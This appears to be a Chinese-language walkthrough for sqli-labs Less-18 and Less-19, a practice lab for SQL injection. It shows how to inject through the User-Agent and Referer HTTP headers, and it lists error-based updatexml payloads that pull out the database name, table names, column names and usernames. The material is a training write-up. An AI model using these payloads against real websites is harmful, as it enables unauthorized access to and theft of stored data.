less18 19

登录失败显示ip地址

登录成功显示ip地址和User-Agent----- 浏览器的版本

 

 

 

 如果出现密码不正确 登录不上去 可能是第17关修改了密码  解决方案 可是在17关将密码修改回来

或者在主页 重置数据库

发现有转义操作  所以不能对用户名和密码进行盲注

 

 

 

最后测试发现可以在http头部user-agent的地方注入。

 

再次执行 查看post信息，我们注入的时候考虑---ip地址和User-Agent  这俩个地址

 

插入俩句语句 再次观察

 

 

 

 

 

 　　　　　INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)

　　　 　　VALUES ('Mozilla/5.0 (Windows NT 5.2; rv:17.0) Gecko/20100101 Firefox/17.0', '192.168.50.100', 'admin')   显示浏览器信息，ip地址，用户名

 

涉及到的sql语句  可以在命令行中验证对错

 

----' or updatexml(1,concat(0x7e,()),1);
----select  updatexml(1,concat(0x7e,(database())),1);

 

查当前数据库：'or updatexml(1,concat(0x7e,(database())),1) or '1'='1（注意闭合）

 

 

或者'or updatexml(1,concat(0x7e,(database())),1) ,  "   ,  "    )#   闭合sql语句    空的部分是将用户名和密码位置空出来

 

' or updatexml(1,concat(0x7e,(database())),1), '','')#
库　　' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
表  　　' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
列　　' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
字段 　　' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#

 

less19

 

 

第19关的回显信息

 

 

 

通过insert语句 进行分析

INSERT INTO `security`.`referers` (`referer`, `ip_address`)

　　　　　　VALUES ('http://192.168.50.100/sqli/Less-19/', '192.168.50.100')

分析后得知，需要进行闭合操作，两种方法：
（1）' or updatexml(1,concat(0x7e,(database())),1) and '1'=‘1
（2）‘ or updatexml(1,concat(0x7e,(database())),1), ‘’)#